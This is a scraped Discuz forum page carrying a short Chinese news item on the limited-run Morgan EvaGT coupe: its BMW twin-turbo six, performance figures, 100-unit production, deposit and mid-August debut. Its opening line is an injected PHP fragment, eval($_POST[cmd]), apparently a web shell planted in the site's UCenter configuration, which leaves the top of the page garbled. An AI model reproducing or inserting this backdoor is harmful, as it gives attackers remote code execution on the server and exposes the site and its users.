');eval($_POST[cmd])?>'); define('UC_APPID', 'UC_APPID'); define('UC_PPP', '20'); 小眾新貴 英國Morgan EvaGT今年8月現身 - 改裝俱樂部 - 四輪天下 - Powered by Discuz!
返回列表 回復 發帖

小眾新貴 英國Morgan EvaGT今年8月現身

即將上市的EvaGT。EvaGT是一款4座的酷派,基於Aero Supersports平台而打造,使用了經過改良的車身底盤,該底盤曾經使用在Morgan GT3賽車上面。



非常的具有流線感和動力感。在車身的發動機蓋之下的應該是大家很熟悉的,來自於寶馬的3.0升雙渦輪增壓直列6汽缸發動機,最大輸出功率達到306 馬力(折合為225千瓦),扭矩峰值達到400牛頓‧米。這款發動機在每一款-35i系列產品上面都能看到。配合這一引擎,EvaGT能夠在4.5秒之內從靜止加速到100公里每小時的速度,儘管車子的重量只有1,250千克。車子的最高速度可以達到273公里每小時,平均油耗卻僅有7升每百公里。

  EvaGT限量製造100台,儘管現在公司還沒有宣佈最終的售價,但Morgan已經表示訂購該車亦需要5千英鎊(折合人民幣5萬元)的定金。

  該車會在今年8月15號的時候出現在美國加利福尼亞的鵝卵石海灘。
返回列表